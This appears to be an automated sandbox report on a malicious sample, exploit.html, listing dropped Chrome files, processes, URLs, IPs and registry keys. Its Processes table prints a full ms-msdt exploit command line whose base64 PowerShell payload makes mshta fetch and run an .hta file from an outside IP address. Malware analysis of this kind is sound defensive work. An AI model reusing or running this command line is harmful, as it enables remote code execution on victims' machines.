Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
exploit.html
|
HTML document, ASCII text, with very long lines, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Program Files\Google\Chrome\Application\Dictionaries\en-US-9-0.bdic
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\2c5570d4-8331-4e9a-adfe-3c38d4d61db1.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\4f207098-74aa-4909-9da3-6e5fb2d9aa0b.tmp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\5699ede8-6094-429e-87a5-2b94c6579fbd.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\59c9efa2-546b-45a0-bc02-82a09973cdfe.tmp
|
ASCII text, with very long lines, with no line terminators
|
modified
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\69996d42-fed4-4148-8649-9e0a58855323.tmp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\7dcdeb89-4f6d-41a3-949d-a264a71a8a9d.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\878823b6-4d55-43ac-a35a-3a9af8d2335b.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\947d1950-d9ed-4d4c-b6f3-d85cb83d9252.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\1011f307-6c0f-49d3-8abb-71191d82ca19.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\20723a87-c069-4756-9b95-3d09a40f8daf.tmp
|
UTF-8 Unicode text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\3d4a84fb-912b-4571-8b3e-b938a83e6574.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\4a5e03c8-82be-4c64-9d00-9e285046bb4b.tmp
|
UTF-8 Unicode text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\6c1b8af8-28aa-4b29-abbf-af10d222ea45.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\81a17723-b5f6-4aed-a673-be9c3b700790.tmp
|
UTF-8 Unicode text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\86ce7cad-3508-4167-9f8c-173f787d888b.tmp
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_metadata\computed_hashes.json
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\000003.log
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\LOG
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\LOG.old (copy)
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Provider Cache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network Persistent State (copy)
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences (copy)
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences (copy)
|
UTF-8 Unicode text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\4b7d164a-c6e6-479c-871f-77158ea93dec.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\GPUCache\data_1
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Network Persistent
State (copy)
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\3b876bb9-6f13-4008-a449-fcb4db3ef49f.tmp
|
ASCII text, with very long lines, with no line terminators
|
modified
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache\data_1
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network Persistent
State (copy)
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\a687b23f-1d33-408d-9e44-0a7a2c1fa154.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\b0c08d12-baf4-438c-937f-2d70ec00425c.tmp
|
UTF-8 Unicode text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\000004.dbtmp
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\CURRENT (copy)
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Last Browser
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Last Version
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State (copy)
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Module Info Cache (copy)
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\d5bb3a63-4aca-4e43-b3c0-59212649ca59.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\d7428df8-2a65-4f36-985b-421cb3e281d6.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\d8105d3d-4765-4fd5-b8da-5726c5f1b72e.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\4917c6a3-eaa1-404b-83fd-e249aa3d56fa.tmp
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\4da22d7b-7d8d-4364-a4ad-2c80d566c5af.tmp
|
Google Chrome extension, version 3
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\5140_1231521969\_metadata\verified_contents.json
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\5140_1231521969\_platform_specific\x86_64\pnacl_public_pnacl_json
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\5140_1231521969\_platform_specific\x86_64\pnacl_public_x86_64_crtbegin_for_eh_o
|
ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), not stripped
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\5140_1231521969\_platform_specific\x86_64\pnacl_public_x86_64_crtbegin_o
|
ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), not stripped
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\5140_1231521969\_platform_specific\x86_64\pnacl_public_x86_64_crtend_o
|
ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), not stripped
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\5140_1231521969\_platform_specific\x86_64\pnacl_public_x86_64_ld_nexe
|
ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, BuildID[sha1]=7511538a3a6a0b862c772eace49075ed1bbe2377,
stripped
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\5140_1231521969\_platform_specific\x86_64\pnacl_public_x86_64_libcrt_platform_a
|
current ar archive
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\5140_1231521969\_platform_specific\x86_64\pnacl_public_x86_64_libgcc_a
|
current ar archive
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\5140_1231521969\_platform_specific\x86_64\pnacl_public_x86_64_libpnacl_irt_shim_a
|
current ar archive
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\5140_1231521969\_platform_specific\x86_64\pnacl_public_x86_64_libpnacl_irt_shim_dummy_a
|
current ar archive
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\5140_1231521969\_platform_specific\x86_64\pnacl_public_x86_64_pnacl_llc_nexe
|
ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, BuildID[sha1]=309d6d3d463e6b1b0690f39eb226b1e4c469b2ce,
stripped
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\5140_1231521969\_platform_specific\x86_64\pnacl_public_x86_64_pnacl_sz_nexe
|
ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, BuildID[sha1]=4b15de4ab227d5e46213978b8518d53c53ce1db9,
stripped
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\5140_1231521969\manifest.fingerprint
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\5140_1231521969\manifest.json
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\5140_246599626\Recovery.crx3
|
Google Chrome extension, version 3
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\5140_246599626\_metadata\verified_contents.json
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\5140_246599626\manifest.fingerprint
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\5140_246599626\manifest.json
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5140_6195884\4da22d7b-7d8d-4364-a4ad-2c80d566c5af.tmp
|
Google Chrome extension, version 3
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5140_6195884\CRX_INSTALL\_locales\bg\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5140_6195884\CRX_INSTALL\_locales\ca\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5140_6195884\CRX_INSTALL\_locales\cs\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5140_6195884\CRX_INSTALL\_locales\da\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5140_6195884\CRX_INSTALL\_locales\de\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5140_6195884\CRX_INSTALL\_locales\el\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5140_6195884\CRX_INSTALL\_locales\en\messages.json
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5140_6195884\CRX_INSTALL\_locales\en_GB\messages.json
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5140_6195884\CRX_INSTALL\_locales\es\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5140_6195884\CRX_INSTALL\_locales\es_419\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5140_6195884\CRX_INSTALL\_locales\et\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5140_6195884\CRX_INSTALL\_locales\fi\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5140_6195884\CRX_INSTALL\_locales\fil\messages.json
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5140_6195884\CRX_INSTALL\_locales\fr\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5140_6195884\CRX_INSTALL\_locales\hi\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5140_6195884\CRX_INSTALL\_locales\hr\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5140_6195884\CRX_INSTALL\_locales\hu\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5140_6195884\CRX_INSTALL\_locales\id\messages.json
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5140_6195884\CRX_INSTALL\_locales\it\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5140_6195884\CRX_INSTALL\_locales\ja\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5140_6195884\CRX_INSTALL\_locales\ko\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5140_6195884\CRX_INSTALL\_locales\lt\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5140_6195884\CRX_INSTALL\_locales\lv\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5140_6195884\CRX_INSTALL\_locales\nb\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5140_6195884\CRX_INSTALL\_locales\nl\messages.json
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5140_6195884\CRX_INSTALL\_locales\pl\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5140_6195884\CRX_INSTALL\_locales\pt_BR\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5140_6195884\CRX_INSTALL\_locales\pt_PT\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5140_6195884\CRX_INSTALL\_locales\ro\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5140_6195884\CRX_INSTALL\_locales\ru\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5140_6195884\CRX_INSTALL\_locales\sk\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5140_6195884\CRX_INSTALL\_locales\sl\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5140_6195884\CRX_INSTALL\_locales\sr\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5140_6195884\CRX_INSTALL\_locales\sv\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5140_6195884\CRX_INSTALL\_locales\th\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5140_6195884\CRX_INSTALL\_locales\tr\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5140_6195884\CRX_INSTALL\_locales\uk\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5140_6195884\CRX_INSTALL\_locales\vi\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5140_6195884\CRX_INSTALL\_locales\zh_CN\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5140_6195884\CRX_INSTALL\_locales\zh_TW\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5140_6195884\CRX_INSTALL\_metadata\verified_contents.json
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5140_6195884\CRX_INSTALL\craw_background.js
|
ASCII text, with very long lines
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5140_6195884\CRX_INSTALL\craw_window.js
|
ASCII text, with very long lines
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5140_6195884\CRX_INSTALL\css\craw_window.css
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5140_6195884\CRX_INSTALL\html\craw_window.html
|
HTML document, ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5140_6195884\CRX_INSTALL\images\flapper.gif
|
GIF image data, version 89a, 30 x 30
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5140_6195884\CRX_INSTALL\images\icon_128.png
|
PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5140_6195884\CRX_INSTALL\images\icon_16.png
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5140_6195884\CRX_INSTALL\images\topbar_floating_button.png
|
PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5140_6195884\CRX_INSTALL\images\topbar_floating_button_close.png
|
PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5140_6195884\CRX_INSTALL\images\topbar_floating_button_hover.png
|
PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5140_6195884\CRX_INSTALL\images\topbar_floating_button_maximize.png
|
PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5140_6195884\CRX_INSTALL\images\topbar_floating_button_pressed.png
|
PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir5140_6195884\CRX_INSTALL\manifest.json
|
ASCII text, with CRLF line terminators
|
dropped
|
There are 108 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --enable-automation "C:\Users\user\Desktop\exploit.html
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1536,17114372066093908599,17355976627410692740,131072
--lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1940 /prefetch:8
|
||
|
C:\Windows\System32\msdt.exe
|
"C:\Windows\system32\msdt.exe" ms-msdt:/id%20PCWDiagnostic%20/skip%20force%20/param%20%22IT_RebrowseForFile=?%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'bQBzAGgAdABhACAAaAB0AHQAcAA6AC8ALwAxADUAOQAuADcANQAuADEAMwA1AC4AMQA2ADIAOgA2ADEAMgA1ADYALwBkAGwAbABoAG8AcwB0AC4AaAB0AGEA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe%22
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://dns.google
|
unknown
|
||
|
https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.p
|
unknown
|
||
|
https://www.google.com/intl/en-US/chrome/blank.html
|
unknown
|
||
|
https://ogs.google.com
|
unknown
|
||
|
https://www.google.com/images/cleardot.gif
|
unknown
|
||
|
https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=85.0.4183.121&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1
|
142.250.203.110
|
||
|
https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard
|
172.217.168.45
|
||
|
https://payments.google.com/payments/v4/js/integrator.js
|
unknown
|
||
|
https://chromium.googlesource.com/a/native_client/pnacl-llvm.git
|
unknown
|
||
|
https://sandbox.google.com/payments/v4/js/integrator.js
|
unknown
|
||
|
https://www.google.com/images/x2.gif
|
unknown
|
||
|
https://accounts.google.com/MergeSession
|
unknown
|
||
|
http://llvm.org/):
|
unknown
|
||
|
https://www.google.com
|
unknown
|
||
|
https://www.google.com/images/dot2.gif
|
unknown
|
||
|
https://code.google.com/p/nativeclient/issues/entry%s:
|
unknown
|
||
|
https://code.google.com/p/nativeclient/issues/entry
|
unknown
|
||
|
https://accounts.google.com
|
unknown
|
||
|
https://clients2.googleusercontent.com
|
unknown
|
||
|
https://apis.google.com
|
unknown
|
||
|
https://www.google.com/accounts/OAuthLogin?issueuberauth=1
|
unknown
|
||
|
https://www.google.com/
|
unknown
|
||
|
https://www-googleapis-staging.sandbox.google.com
|
unknown
|
||
|
https://chromium.googlesource.com/a/native_client/pnacl-clang.git
|
unknown
|
||
|
https://clients2.google.com
|
unknown
|
||
|
https://clients2.google.com/service/update2/crx
|
unknown
|
There are 16 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
accounts.google.com
|
172.217.168.45
|
||
|
clients.l.google.com
|
142.250.203.110
|
||
|
clients2.google.com
|
unknown
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
172.217.168.45
|
accounts.google.com
|
United States
|
||
|
192.168.2.1
|
unknown
|
unknown
|
||
|
239.255.255.250
|
unknown
|
Reserved
|
||
|
142.250.203.110
|
clients.l.google.com
|
United States
|
||
|
127.0.0.1
|
unknown
|
unknown
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\system32\msdt.exe.FriendlyAppName
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\system32\msdt.exe.ApplicationCompany
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Google\Update\ClientStateMedium\{8A69D345-D564-463C-AFF1-A69D9E530F96}\LastWasDefault
|
S-1-5-21-3853321935-2125563209-4053062332-1002
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
ahfgeienlihckogmohjhadlkjgocpleb
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
gdaefkejpgkiemlaofpalmlakkmbjdnl
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
gfdkimpbcpahaombhbimeihdjnejgicl
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
kmendfapggjehodndflmmgagdbamhnfd
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
mfehgcgbbipciphmccgaenjidiccnmng
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
mhjfbmdgcfjbbpaeojofohoefgiehjai
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
neajdppkdcdipfabeoofebfddakdcjhd
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
nkeimhogjdpnpccoofpliimaahmaaome
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
pkedcjkdefgpdelpbcmbmeomcjbeemfm
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
prefs.preference_reset_time
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
gfdkimpbcpahaombhbimeihdjnejgicl
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
nmmhkkegccagdldgiimedpiccmgmieda
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
nmmhkkegccagdldgiimedpiccmgmieda
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
nmmhkkegccagdldgiimedpiccmgmieda
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon
|
state
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\ThirdParty
|
StatusCodes
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\ThirdParty
|
StatusCodes
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon
|
state
|
||
|
HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
|
dr
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
software_reporter.reporting
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
module_blacklist_cache_md5_digest
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
media.storage_id_salt
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
google.services.last_account_id
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
google.services.account_id
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
software_reporter.prompt_seed
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
settings_reset_prompt.last_triggered_for_homepage
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
default_search_provider_data.template_url_data
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
safebrowsing.incidents_sent
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
pinned_tabs
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
search_provider_overrides
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
settings_reset_prompt.last_triggered_for_default_search
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
prefs.preference_reset_time
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
google.services.last_username
|
||
|
